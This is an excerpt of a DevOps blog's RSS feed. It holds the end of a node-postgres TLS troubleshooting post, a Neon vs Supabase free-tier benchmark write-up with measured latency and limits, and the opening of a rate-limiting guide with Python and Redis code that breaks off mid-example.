<span class="hljs-keyword">const</span> sock = net.<span class="hljs-title function_">connect</span>(<span class="hljs-number">5432</span>, <span class="hljs-string">&#x27;your-db-host&#x27;</span>, <span class="hljs-function">() =&gt;</span> {
  sock.<span class="hljs-title function_">write</span>(<span class="hljs-title class_">Buffer</span>.<span class="hljs-title function_">from</span>([<span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">8</span>, <span class="hljs-number">4</span>, <span class="hljs-number">210</span>, <span class="hljs-number">22</span>, <span class="hljs-number">47</span>])); <span class="hljs-comment">// Postgres SSLRequest</span>
  sock.<span class="hljs-title function_">once</span>(<span class="hljs-string">&#x27;data&#x27;</span>, <span class="hljs-function">() =&gt;</span> {
    <span class="hljs-keyword">const</span> t = tls.<span class="hljs-title function_">connect</span>(
      { <span class="hljs-attr">socket</span>: sock, <span class="hljs-attr">ca</span>: <span class="hljs-title function_">readFileSync</span>(<span class="hljs-string">&#x27;./provider-ca.crt&#x27;</span>), <span class="hljs-attr">servername</span>: <span class="hljs-string">&#x27;your-db-host&#x27;</span> },
      <span class="hljs-function">() =&gt;</span> <span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-string">&#x27;authorized:&#x27;</span>, t.<span class="hljs-property">authorized</span>, t.<span class="hljs-property">authorizationError</span> ?? <span class="hljs-string">&#x27;&#x27;</span>)
    );
  });
});
</code></pre><p>Postgres TLS starts with an in-protocol handshake (that 8-byte <code>SSLRequest</code> message), so plain <code>openssl s_client</code> needs <code>-starttls postgres</code> for the same check. If this prints <code>authorized: true</code> while pg fails with the same CA, you are not fighting certificates. You are fighting configuration precedence, and the URL is the first place to look.</p>
<h2 id="h2-takeaways" class="group relative scroll-mt-24">
        <a href="#h2-takeaways" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Takeaways
        </a>
        </h2><ul>
<li><code>sslmode</code> in a node-postgres connection string overrides your <code>ssl</code> options object. Silently. Keep TLS config in the <code>ssl</code> object and keep <code>sslmode</code> out of your URLs.</li>
<li>node-postgres currently treats <code>require</code> as <code>verify-full</code>, unlike libpq. pg v9 will flip to libpq semantics, weakening what your existing strings mean.</li>
<li>Never reach for <code>rejectUnauthorized: false</code>. The fix is removing the conflicting URL parameter, not removing verification.</li>
<li>For Supabase specifically: grab their root CA, expect IPv6-only direct hosts on the free plan, and read the pooler hostname from your own project settings.</li>
</ul>
<p>The full context, with measured numbers around it, is in our <a href="https://devops-daily.com/posts/neon-vs-supabase-free-tier-benchmarks">Neon vs Supabase free tier benchmarks</a>, and the harness where we hit this is open at <a href="https://github.com/The-DevOps-Daily/serverless-postgres-benchmarks">The-DevOps-Daily/serverless-postgres-benchmarks</a> with a <a href="https://postgres-benchmarks.devops-daily.com/">live results dashboard</a>.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[Neon vs Supabase Free Tiers: We Benchmarked Both So You Don't Have To]]></title>
      <link>https://devops-daily.com/posts/neon-vs-supabase-free-tier-benchmarks</link>
      <description><![CDATA[We ran 320 timed operations against the Neon and Supabase free tiers from a same-region client: query latency, project creation, cold starts, and branching. The latency race is a tie, and the real differences are nothing like the marketing.]]></description>
      <pubDate>Wed, 10 Jun 2026 18:30:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/neon-vs-supabase-free-tier-benchmarks</guid>
      <category><![CDATA[DevOps]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[postgres]]></category><category><![CDATA[neon]]></category><category><![CDATA[supabase]]></category><category><![CDATA[databases]]></category><category><![CDATA[serverless]]></category><category><![CDATA[benchmarks]]></category>
      <content:encoded><![CDATA[<p>Pick any &quot;Neon vs Supabase&quot; thread on the internet and you will find the same spec-sheet ping pong: one side quotes storage limits, the other quotes monthly active users, and nobody has actually timed anything. Both platforms hand out free Postgres, both claim to be fast, and both free tiers have sharp edges that only show up when you run real operations against them.</p>
<p>So we ran real operations against them. 320 timed samples across nine operation types, both platforms in the same AWS region (eu-central-1, Frankfurt), measured from a client VM in the same metro so network distance could not put a thumb on the scale. Every raw sample, the harness that produced it, and a live dashboard are public, so you can check the math or rerun the whole thing yourself: explore the <a href="https://postgres-benchmarks.devops-daily.com/">live results dashboard</a> or read the harness at <a href="https://github.com/The-DevOps-Daily/serverless-postgres-benchmarks">The-DevOps-Daily/serverless-postgres-benchmarks</a>.</p>
<p>This is the free tier piece. Paid-tier operations (read replicas, compute resizing, Supabase branching) get their own article once those runs land.</p>
<h2 id="h2-tldr" class="group relative scroll-mt-24">
        <a href="#h2-tldr" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          TLDR
        </a>
        </h2><ul>
<li><strong>Query latency is a tie.</strong> Every connection path on both platforms lands at a 25 to 30 ms median for a full connect + TLS + auth + query cycle from a same-region client. Do not pick either platform for single-query speed.</li>
<li><strong>Project creation is closer than you think.</strong> Neon: 5.7 s median to a queryable database. Supabase: 7.4 s. Both have outliers above 11 s.</li>
<li><strong>The idle behavior is the real difference.</strong> Neon free databases scale to zero after 5 minutes and wake automatically in about 570 ms. Supabase free projects pause after 7 days of inactivity and stay down until you log in and restore them by hand.</li>
<li><strong>Branching only exists on one side.</strong> Neon free includes copy-on-write branches that arrive carrying the parent&#39;s data, queryable in 2.2 s. Supabase branching requires a paid plan and starts without data.</li>
<li><strong>Networking will surprise you.</strong> Supabase free-tier direct connections are IPv6-only. From an IPv4 client (most CI runners, many VPSes, most home networks) you must use their pooler, and the TLS chain is signed by Supabase&#39;s own CA.</li>
</ul>
<h2 id="h2-how-we-measured" class="group relative scroll-mt-24">
        <a href="#h2-how-we-measured" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          How we measured
        </a>
        </h2><p>The harness is a small TypeScript runner that drives each platform&#39;s management API plus a regular <code>pg</code> connection. The rules:</p>
<ul>
<li>Both platforms in <strong>aws eu-central-1</strong>, measured from a 2 vCPU VM in Frankfurt (1 to 2 ms from both).</li>
<li>Every operation runs repeatedly: 50 runs for latency paths, 20 for project creation and cold starts, 10 for branching. Reports use <strong>median and p95</strong>, never single runs.</li>
<li>Latency samples use a <strong>cold connection each time</strong>: connect, TLS handshake, auth, <code>select 1</code>, disconnect. That is what a serverless function pays per invocation without a warm pool, and it is a fairer test than hammering one warm session.</li>
<li>Every resource is created fresh, named <code>bench-*</code>, and deleted after the run.</li>
<li>Raw samples are committed to the repo with region, plan, and client metadata. The numbers below link to data, not to memory.</li>
</ul>
<p>Free plans on both sides, as of June 2026.</p>
<h2 id="h2-query-latency-stop-arguing-about-it" class="group relative scroll-mt-24">
        <a href="#h2-query-latency-stop-arguing-about-it" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Query latency: stop arguing about it
        </a>
        </h2><p>Five different connection paths, 50 cold-connection cycles each:</p>
<div class="post-chart not-prose" data-chart="{&quot;type&quot;:&quot;bar&quot;,&quot;title&quot;:&quot;Query latency: cold connection, select 1 (median, 50 runs each)&quot;,&quot;unit&quot;:&quot;ms&quot;,&quot;tickLabel&quot;:&quot;p95&quot;,&quot;caption&quot;:&quot;Full connect + TLS + auth + query cycle from a same-metro client.&quot;,&quot;rows&quot;:[{&quot;label&quot;:&quot;Neon, pooled&quot;,&quot;value&quot;:25.1,&quot;tick&quot;:36,&quot;series&quot;:&quot;Neon&quot;},{&quot;label&quot;:&quot;Neon, direct&quot;,&quot;value&quot;:29.4,&quot;tick&quot;:63.3,&quot;series&quot;:&quot;Neon&quot;},{&quot;label&quot;:&quot;Supabase, direct (IPv6)&quot;,&quot;value&quot;:27.9,&quot;tick&quot;:33.6,&quot;series&quot;:&quot;Supabase&quot;},{&quot;label&quot;:&quot;Supabase, session pooler&quot;,&quot;value&quot;:29,&quot;tick&quot;:37.2,&quot;series&quot;:&quot;Supabase&quot;},{&quot;label&quot;:&quot;Supabase, transaction pooler&quot;,&quot;value&quot;:29.9,&quot;tick&quot;:40.6,&quot;series&quot;:&quot;Supabase&quot;}]}"></div><p>That is a 5 ms spread across ten thousand-ish kilometers of marketing. At equal network distance, the free tiers are latency-equivalent for a single query. The spread between the fastest and slowest path on the <em>same</em> platform is bigger than the spread between platforms.</p>
<p>The percentile view makes the tails visible too. Every one of the 250 samples, ranked:</p>
<div class="post-chart not-prose" data-chart="{&quot;type&quot;:&quot;cdf&quot;,&quot;title&quot;:&quot;Query latency percentiles (50 cold connections per path)&quot;,&quot;unit&quot;:&quot;ms&quot;,&quot;caption&quot;:&quot;Read p50 and p95 off the dashed lines. The long green tail is Neon direct.&quot;,&quot;series&quot;:[{&quot;name&quot;:&quot;Neon pooler&quot;,&quot;samples&quot;:[40.5,39,34.1,36,31,25,21.5,26.6,31.9,29.2,27.5,23.3,31.4,27.5,23.1,22,20.8,24.6,29.1,20.8,24.1,30.6,28.9,21.6,25.1,23,31.8,23.2,21.3,19.8,26.5,22.4,22.3,28.2,29.1,26.1,24.5,25.9,24.5,20.1,33,20.4,23,19.7,22.5,27.5,23.8,26.1,28.8,25.8],&quot;color&quot;:&quot;#10b981&quot;},{&quot;name&quot;:&quot;Neon direct&quot;,&quot;dash&quot;:&quot;6 5&quot;,&quot;samples&quot;:[37,24.7,31.1,29.9,73.8,63.3,42.3,66.2,45.6,49.9,43.9,28.4,27.9,37.4,29,29,24.5,25,27,32.7,34.6,39.2,26.2,32.8,29.4,27.9,34.7,29.8,33.2,26.3,27.5,33,36.6,32.4,30,33.9,26.7,30.7,26.3,25.9,29,26.7,26.8,26,24.7,26.8,27.8,29.5,27.2,24.1],&quot;color&quot;:&quot;#10b981&quot;},{&quot;name&quot;:&quot;Supabase direct (IPv6)&quot;,&quot;samples&quot;:[27,28.5,31.6,29.5,31.1,33.6,27.5,27.3,30.2,26.6,29.4,27.8,26.4,27.9,30,34.2,30.7,29.1,29.1,31.6,24.9,29.6,30.4,31.9,25,25.7,28,32.3,27.3,27.1,25.4,27.3,27.2,26.6,29.7,26.3,28.9,26.1,29.4,24.9,29.3,24.9,26.3,30.8,27.1,25.6,34.4,25.1,27.9,26.6],&quot;color&quot;:&quot;#38bdf8&quot;},{&quot;name&quot;:&quot;Supabase session&quot;,&quot;dash&quot;:&quot;6 5&quot;,&quot;samples&quot;:[37.2,34.7,28.5,34.3,31.4,32.7,37.3,29,36,35.7,32.3,31.2,27.6,34.2,28.8,27.5,30.6,28.4,28.3,26.5,27.3,28.9,29.5,34.2,24.3,29.7,29.9,24.6,27.2,26.7,27.9,29.4,33,29.3,33.7,25.3,27.4,29.8,26.1,28.4,31.2,25.8,25.1,27,27,34.1,23.3,24.8,37.8,30.9],&quot;color&quot;:&quot;#38bdf8&quot;}]}"></div><p>What this means in practice: latency should not be on your decision sheet at all. 
Region placement matters about 10x more than vendor choice, because every millisecond of client-to-region distance gets added to each of these numbers.</p>
<h2 id="h2-project-creation-both-are-fast-now" class="group relative scroll-mt-24">
        <a href="#h2-project-creation-both-are-fast-now" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Project creation: both are fast now
        </a>
        </h2><p>Time from the management API call to the first successful <code>select 1</code>, 20 runs each:</p>
<table>
<thead>
<tr>
<th>Platform</th>
<th>Median</th>
<th>p95</th>
<th>Range</th>
</tr>
</thead>
<tbody><tr>
<td>Neon</td>
<td>5.7 s</td>
<td>8.8 s</td>
<td>3.5 s to 13.6 s</td>
</tr>
<tr>
<td>Supabase</td>
<td>7.4 s</td>
<td>11.8 s</td>
<td>6.5 s to 11.9 s</td>
</tr>
</tbody></table>
<p>Two things stood out. First, both are genuinely fast: a complete, queryable Postgres in single-digit seconds. Supabase used to take minutes to provision a project; that reputation is outdated. Second, neither is consistent: Neon&#39;s fastest run was 3.5 s and its slowest 13.6 s, nearly a 4x spread, so do not build automation that assumes the median.</p>
<div class="post-chart not-prose" data-chart="{&quot;type&quot;:&quot;dots&quot;,&quot;title&quot;:&quot;Project creation: API call to first successful query&quot;,&quot;unit&quot;:&quot;ms&quot;,&quot;caption&quot;:&quot;20 runs each, aws eu-central-1, free plans, June 2026. Amber line is the median.&quot;,&quot;series&quot;:[{&quot;name&quot;:&quot;Neon&quot;,&quot;samples&quot;:[6088.4,5801.6,5593.9,5573.1,13558,6011.9,5474.2,5775.9,5683.7,5528.4,5705.2,8568.3,3571.7,5765,5718.4,3462,5491.3,3927.3,8751.6,8803.3]},{&quot;name&quot;:&quot;Supabase&quot;,&quot;samples&quot;:[7621.3,11884.2,7052.1,6492.8,8521.4,7380.4,6873.7,8101.3,9189,9933.4,6777.1,6947.2,7473.7,7936.5,6802.8,6921.1,7105.7,7337.1,11765,8402.1]}]}"></div><p>If your workflow creates databases programmatically (per-tenant databases, ephemeral test environments, agent-driven tooling), both free tiers can technically do it, but the caps differ wildly: Neon allows up to 100 projects on the free plan, Supabase allows 2 active projects per organization. For anything that creates databases in a loop, that single line of the spec sheet decides for you before any benchmark does.</p>
<h2 id="h2-idle-behavior-a-nap-versus-a-coma" class="group relative scroll-mt-24">
        <a href="#h2-idle-behavior-a-nap-versus-a-coma" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Idle behavior: a nap versus a coma
        </a>
        </h2><p>This is the section that should actually drive your decision for side projects, and it is the one spec sheets describe worst.</p>
<p><strong>Neon</strong> free compute always scales to zero after 5 minutes of inactivity. You cannot turn that off on the free plan. The flip side: it wakes automatically on the next connection. We suspended and woke a database 20 times:</p>
<ul>
<li>Wake query (first query against suspended compute): <strong>568 ms median, 1.06 s p95</strong>, worst case 1.55 s.</li>
</ul>
<div class="post-chart not-prose" data-chart="{&quot;type&quot;:&quot;dots&quot;,&quot;title&quot;:&quot;Neon cold start: first query against suspended compute&quot;,&quot;unit&quot;:&quot;ms&quot;,&quot;caption&quot;:&quot;20 suspend/wake cycles. Neon documents 300-500 ms as typical.&quot;,&quot;series&quot;:[{&quot;name&quot;:&quot;wake query&quot;,&quot;samples&quot;:[576.9,580.3,1553.8,567.7,563.1,572.8,557.8,571,567.1,557.3,562.6,573.4,558.3,554.5,566.3,565.1,586.9,571.7,583.1,1061.9]}]}"></div><p>Neon&#39;s docs say cold starts are &quot;typically a few hundred milliseconds&quot; with 500 ms as the usual ceiling. Measured from a same-region client, reality is a bit slower: our median sat just above their typical ceiling, and the p95 crossed a full second. Not bad, just not quite the brochure. For a hobby app behind a page load, an occasional extra half second on the first request after a quiet stretch is invisible. For a latency-sensitive API that gets sparse traffic, it is a real consideration.</p>
<p><strong>Supabase</strong> free compute never naps; your project runs a dedicated instance around the clock, so there are no cold starts at all. Instead, after 7 days without activity, the whole project is <strong>paused</strong>. A paused project does not wake on connection. You log into the dashboard and restore it manually, which takes on the order of minutes, and until you do, every connection fails outright.</p>
<p>So the trade is: Neon costs you ~570 ms after every 5 quiet minutes but never needs you; Supabase costs you nothing while active but a manual rescue if you ever leave it alone for a week. For a demo you show twice a month, that 7-day pause is the difference between &quot;works when the customer clicks&quot; and &quot;dead link in your portfolio.&quot;</p>
<h2 id="h2-branching-only-one-of-them-brings-the-data" class="group relative scroll-mt-24">
        <a href="#h2-branching-only-one-of-them-brings-the-data" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Branching: only one of them brings the data
        </a>
        </h2><p>Database branching is the headline feature of serverless Postgres, and on free tiers it is not a comparison, because only Neon has it there. We branched a project carrying 100,000 seeded rows, 10 times:</p>
<ul>
<li>Writable branch, parent&#39;s full dataset included, queryable: <strong>2.2 s median, 3.2 s p95</strong>.</li>
</ul>
<p>One honest nuance the marketing skips: the copy-on-write storage operation itself is effectively instant, but a usable branch needs its own compute endpoint, and provisioning that is where the 2 seconds go. &quot;Branches in milliseconds&quot; is true at the storage layer and false at the connection string. What you actually get is a full writable copy of a database, with data, in about the time it takes to read this sentence, which is still excellent and still the same primitive that makes per-PR preview databases and agent test loops practical.</p>
<p>Supabase shipped Branching 2.0 in 2025 (Git optional, branch from the dashboard or API), but it requires a paid plan, each branch bills as its own compute, and branches copy schema and config without production data. We will measure it properly in the paid-tier article.</p>
<h2 id="h2-the-networking-fine-print-nobody-tells-you" class="group relative scroll-mt-24">
        <a href="#h2-the-networking-fine-print-nobody-tells-you" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The networking fine print nobody tells you
        </a>
        </h2><p>Three things we hit while building the harness that will absolutely hit you too:</p>
<p><strong>1. Supabase free direct connections are IPv6-only.</strong> <code>db.&lt;ref&gt;.supabase.co</code> has no A record, only AAAA. If your client is IPv4-only, and that includes most CI runners, many cloud VMs by default, and most home ISPs, you cannot reach the direct host at all. You connect through Supavisor instead: session mode on port 5432, transaction mode on 6543. Both pooler paths carry IPv4. (A dedicated IPv4 address for direct connections exists as a paid add-on.) Neon&#39;s endpoints answer on both stacks.</p>
<p><strong>2. The Supabase pooler hostname varies per project.</strong> Our first project landed on <code>aws-1-eu-central-1.pooler.supabase.com</code> while the documented examples reference <code>aws-0-...</code>. Both exist. Do not hardcode the pooler host from a tutorial; read your project&#39;s connection info from the dashboard or the Management API.</p>
<p><strong>3. Supabase database TLS chains to Supabase&#39;s own CA.</strong> The certs are not signed by a public authority, so a client that verifies certificates (which should be all of them) needs <a href="https://supabase.com/docs/guides/platform/ssl-enforcement">their root certificate</a>. And if you use node-postgres, there is a trap inside the trap: when your connection string contains <code>sslmode=require</code>, <code>pg</code> silently ignores the <code>ssl</code> options object where you so carefully loaded that CA file, and verification fails with <code>self-signed certificate in certificate chain</code>. Drop <code>sslmode</code> from the URL and configure TLS exclusively through the <code>ssl</code> option. That one cost us an hour; it is yours for free.</p>
<p>None of these are dealbreakers. All three are the kind of thing you want to know on a Tuesday afternoon rather than discover during a Friday deploy.</p>
<h2 id="h2-the-limits-side-by-side" class="group relative scroll-mt-24">
        <a href="#h2-the-limits-side-by-side" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The limits, side by side
        </a>
        </h2><p>The measured behavior above, plus the caps that matter, as of June 2026:</p>
<table>
<thead>
<tr>
<th></th>
<th>Neon free</th>
<th>Supabase free</th>
</tr>
</thead>
<tbody><tr>
<td>Database storage</td>
<td>0.5 GB per project</td>
<td>500 MB</td>
</tr>
<tr>
<td>Projects</td>
<td>up to 100</td>
<td>2 active</td>
</tr>
<tr>
<td>Compute</td>
<td>100 CU-hours/project/month, autoscaling to 2 CU</td>
<td>dedicated Nano instance, always on</td>
</tr>
<tr>
<td>Idle behavior</td>
<td>scales to zero after 5 min, auto-wakes in ~570 ms</td>
<td>project pauses after 7 days, manual restore</td>
</tr>
<tr>
<td>Branching</td>
<td>10 branches/project, data included, ~2.2 s</td>
<td>not available</td>
</tr>
<tr>
<td>Restore window</td>
<td>6 hours</td>
<td>none (daily backups start on Pro)</td>
</tr>
<tr>
<td>Extras</td>
<td></td>
<td>Auth (50K MAU), storage (1 GB), edge functions (500K), realtime</td>
</tr>
<tr>
<td>Direct connection</td>
<td>IPv4 + IPv6</td>
<td>IPv6 only (pooler for IPv4)</td>
</tr>
</tbody></table>
<h2 id="h2-which-free-tier-should-you-pick" class="group relative scroll-mt-24">
        <a href="#h2-which-free-tier-should-you-pick" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Which free tier should you pick?
        </a>
        </h2><p>The latency tie makes this refreshingly simple: pick on shape, not speed.</p>
<p><strong>Pick Neon&#39;s free tier when the database is the product.</strong> Side projects with irregular traffic (auto-wake beats manual restore), anything that needs many databases (100 projects vs 2), CI and preview environments (branching with data is free-tier-exclusive), and agent or automation workflows that create and destroy databases programmatically.</p>
<p><strong>Pick Supabase&#39;s free tier when you are shipping an app, not a database.</strong> The bundled auth, storage, realtime, and auto-generated APIs replace three or four other free tiers you would otherwise stitch together, and 50K monthly active users of free auth is genuinely hard to beat. Just put a calendar reminder somewhere if the project might go quiet for a week.</p>
<p>One forward-looking note: in June 2026 Neon announced S3-compatible object storage that branches with the database, serverless functions, and an AI gateway, all marked coming soon. If those ship, the bundled-stack gap narrows; we will rerun this comparison when they do.</p>
<p>And if you are still torn, the structural differences run deeper than the free tiers: we maintain a full <a href="https://devops-daily.com/comparisons/neon-vs-supabase">Neon vs Supabase comparison</a> covering architecture, pricing models, PITR, and the paid features side by side.</p>
<h2 id="h2-where-the-series-goes-next" class="group relative scroll-mt-24">
        <a href="#h2-where-the-series-goes-next" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Where the series goes next
        </a>
        </h2><p>This post is part one. The free tiers are where you start, but the interesting differences show up when money and production traffic enter the picture, so we kept going:</p>
<ul>
<li><a href="https://devops-daily.com/posts/neon-vs-supabase-operational-benchmarks">Part two: operational benchmarks</a> times the operations that page you: compute resize (and its downtime), branching at scale, read replicas, point-in-time restore, and 200-connection stampedes, on the paid tiers.</li>
<li><a href="https://devops-daily.com/posts/neon-vs-supabase-scaling-costs">Part three: scaling costs</a> prices the same application through five growth stages on both platforms, with an open source cost model you can rerun on your own workload.</li>
</ul>
<h2 id="h2-run-it-yourself" class="group relative scroll-mt-24">
        <a href="#h2-run-it-yourself" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Run it yourself
        </a>
        </h2><p>Every number in this post is the median of committed raw samples. The <a href="https://postgres-benchmarks.devops-daily.com/">live dashboard</a> tracks every benchmark session (the charts there update as new runs land, including a latency-over-time view), and the harness behind it is about 600 lines of TypeScript: <a href="https://github.com/The-DevOps-Daily/serverless-postgres-benchmarks">The-DevOps-Daily/serverless-postgres-benchmarks</a>. Bring your own API keys, <code>npm run bench</code>, and argue with our data instead of someone&#39;s vibes.</p>
<p>These benchmarks are fully open source, and contributions are welcome. If you spot something off in the methodology, know a fairer way to measure an operation, or get different numbers from another region or another month, open an issue or send a pull request to <a href="https://github.com/The-DevOps-Daily/serverless-postgres-benchmarks">the repo</a>. The whole point of publishing the harness and every raw sample is that this comparison can be checked, challenged, and improved by anyone, instead of being remembered as a vibe.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[Designing Rate Limiting for APIs: Algorithms, Patterns, and Implementation]]></title>
      <link>https://devops-daily.com/posts/designing-rate-limiting-for-apis</link>
      <description><![CDATA[A practical comparison of token bucket, leaky bucket, fixed window, and sliding window rate limiting, with copy-paste Redis and FastAPI code, nginx config, and guidance on which one to actually use.]]></description>
      <pubDate>Mon, 08 Jun 2026 09:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/designing-rate-limiting-for-apis</guid>
      <category><![CDATA[DevOps]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[api-design]]></category><category><![CDATA[rate-limiting]]></category><category><![CDATA[backend]]></category><category><![CDATA[redis]]></category><category><![CDATA[nginx]]></category><category><![CDATA[devops]]></category>
      <content:encoded><![CDATA[<p>At 2am a single customer&#39;s cron job got stuck in a retry loop with no backoff. One API key started sending around 8,000 requests per second. Within ninety seconds the database connection pool was saturated, every other customer was getting timeouts, and the on-call engineer was staring at a dashboard that was all red. There was no rate limiting on that endpoint. One misbehaving client took down the API for everyone.</p>
<p>If you run any public or shared API, this is not a hypothetical. The fix is rate limiting, and the hard part is not the idea, it is picking the right algorithm and implementing it so it actually holds up behind a load balancer.</p>
<p>This post compares the four rate limiting algorithms you will actually see in production (fixed window, sliding window, token bucket, leaky bucket), shows you working code you can copy, and gives you a straight answer on which one to use.</p>
<h2 id="h2-tldr" class="group relative scroll-mt-24">
        <a href="#h2-tldr" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          TLDR
        </a>
        </h2><ul>
<li><strong>Token bucket</strong> is the right default for most public APIs. It allows controlled bursts and is cheap to run in Redis.</li>
<li><strong>Sliding window counter</strong> is the best choice when you want accurate limits without the boundary-burst problem of fixed windows.</li>
<li><strong>Fixed window</strong> is the simplest and cheapest, but it lets a client send up to 2x your limit across a window boundary. Fine for rough internal limits, bad for billing or abuse control.</li>
<li><strong>Leaky bucket</strong> smooths bursty input into a constant output rate. Use it when a downstream system can only handle a fixed throughput, not when you want to allow bursts.</li>
<li>Do the counting in a shared store (Redis) with an atomic operation. In-memory counters break the moment you run more than one instance.</li>
<li>Return <code>429 Too Many Requests</code> with a <code>Retry-After</code> header. Decide up front whether you fail open or fail closed when Redis is down.</li>
</ul>
<h2 id="h2-prerequisites" class="group relative scroll-mt-24">
        <a href="#h2-prerequisites" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Prerequisites
        </a>
        </h2><ul>
<li>A running API service (the examples use Python and FastAPI, but the logic ports to any language)</li>
<li>Redis 6 or newer reachable from your service, for distributed counting</li>
<li>Basic familiarity with HTTP status codes and headers</li>
<li><code>redis-py</code> installed (<code>pip install redis</code>) if you want to run the Python examples</li>
</ul>
<h2 id="h2-why-in-memory-counters-fail-first" class="group relative scroll-mt-24">
        <a href="#h2-why-in-memory-counters-fail-first" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Why in-memory counters fail first
        </a>
        </h2><p>Before the algorithms, the trap everyone hits. The naive version looks like this:</p>
<pre><code class="hljs language-python"><span class="hljs-comment"># DO NOT use this in production</span>
<span class="hljs-keyword">from</span> collections <span class="hljs-keyword">import</span> defaultdict
<span class="hljs-keyword">import</span> time

counters = defaultdict(<span class="hljs-built_in">list</span>)

<span class="hljs-keyword">def</span> <span class="hljs-title function_">allow</span>(<span class="hljs-params">client_id, limit=<span class="hljs-number">100</span>, window=<span class="hljs-number">60</span></span>):
    now = time.time()
    counters[client_id] = [t <span class="hljs-keyword">for</span> t <span class="hljs-keyword">in</span> counters[client_id] <span class="hljs-keyword">if</span> t &gt; now - window]
    <span class="hljs-keyword">if</span> <span class="hljs-built_in">len</span>(counters[client_id]) &gt;= limit:
        <span class="hljs-keyword">return</span> <span class="hljs-literal">False</span>
    counters[client_id].append(now)
    <span class="hljs-keyword">return</span> <span class="hljs-literal">True</span>
</code></pre><p>This works on your laptop and fails in production for one reason: the counter lives in the memory of a single process. Run three replicas behind a load balancer and each one tracks its own count, so your &quot;100 requests per minute&quot; limit becomes 300. Restart a pod and the counter resets. Autoscale to ten pods and the limit is meaningless.</p>
<p>Rate limiting state has to live somewhere shared and the check has to be atomic. That is why every serious example below uses Redis.</p>
<h2 id="h2-the-four-algorithms" class="group relative scroll-mt-24">
        <a href="#h2-the-four-algorithms" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The four algorithms
        </a>
        </h2><h3 id="h3-fixed-window-counter" class="group relative scroll-mt-24">
        <a href="#h3-fixed-window-counter" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Fixed window counter
        </a>
        </h3><p>Count requests in a fixed time block (say, per calendar minute). When the clock ticks over to the next minute, the count resets to zero.</p>
<pre><code class="hljs language-python"><span class="hljs-keyword">def</span> <span class="hljs-title function_">fixed_window</span>(<span class="hljs-params">redis, key, limit, window</span>):
    count = redis.incr(key)
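    <span class="hljs-comment"># first request in this window, or a key left without a TTL because an</span>
    <span class="hljs-comment"># earlier call died between INCR and EXPIRE: (re)set the expiry</span>
    <span class="hljs-keyword">if</span> count == <span class="hljs-number">1</span> <span class="hljs-keyword">or</span> redis.ttl(key) == -<span class="hljs-number">1</span>:
        redis.expire(key, window)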
    <span class="hljs-keyword">return</span> count &lt;= limit
</code></pre><p>It is fast, uses almost no memory (one integer per client), and is trivial to reason about. The problem is the boundary. A client can send <code>limit</code> requests in the last second of one window and another <code>limit</code> in the first second of the next:</p>
<pre><code class="hljs language-text">window 1 (00:00-00:59)                window 2 (01:00-01:59)
                          |&lt;- 1 second -&gt;|
            100 reqs at 00:59.5    100 reqs at 01:00.2
            = 200 requests in ~0.7 seconds
</code></pre><p>For a limit that maps to real cost (database load, a paid quota), that 2x burst is a real bug. Use fixed window only for rough limits where the occasional double burst does not hurt you.</p>
<h3 id="h3-sliding-window-log" class="group relative scroll-mt-24">
        <a href="#h3-sliding-window-log" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Sliding window log
        </a>
        </h3><p>Keep a timestamp for every request and count how many fall inside the trailing window. This is exact, no boundary problem, but you store one entry per request. A client at 1,000 requests per minute means 1,000 timestamps in memory per client. That cost adds up fast across many clients, so reserve the sliding log for low-volume endpoints where precision matters (think a &quot;5 password resets per hour&quot; rule).</p>
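<p>The boundary burst from the fixed window section, replayed against a fixed window counter and a sliding window log. This is an added example, not code from the original post: a single-process simulation with constructed timestamps and hypothetical class names, meant to show the behavior and the memory cost rather than to replace the shared Redis state.</p>

```python
"""Replay the boundary burst against a fixed window counter and a sliding
window log. Single-process simulation with constructed timestamps; a real
deployment keeps this state in a shared store such as Redis."""
from collections import defaultdict, deque


class FixedWindow:
    """One integer per client per window, reset at the window boundary."""

    def __init__(self, limit, window):
        self.limit, self.window = limit, window
        self.counts = defaultdict(int)  # (client, window index) -> count

    def allow(self, client, now):
        bucket = (client, int(now // self.window))
        self.counts[bucket] += 1
        return self.counts[bucket] <= self.limit


class SlidingWindowLog:
    """One timestamp per accepted request, counted over the trailing window."""

    def __init__(self, limit, window):
        self.limit, self.window = limit, window
        self.log = defaultdict(deque)  # client -> accepted request timestamps

    def allow(self, client, now):
        entries = self.log[client]
        # drop timestamps that have left the trailing window
        while entries and entries[0] <= now - self.window:
            entries.popleft()
        if len(entries) >= self.limit:
            return False
        entries.append(now)
        return True

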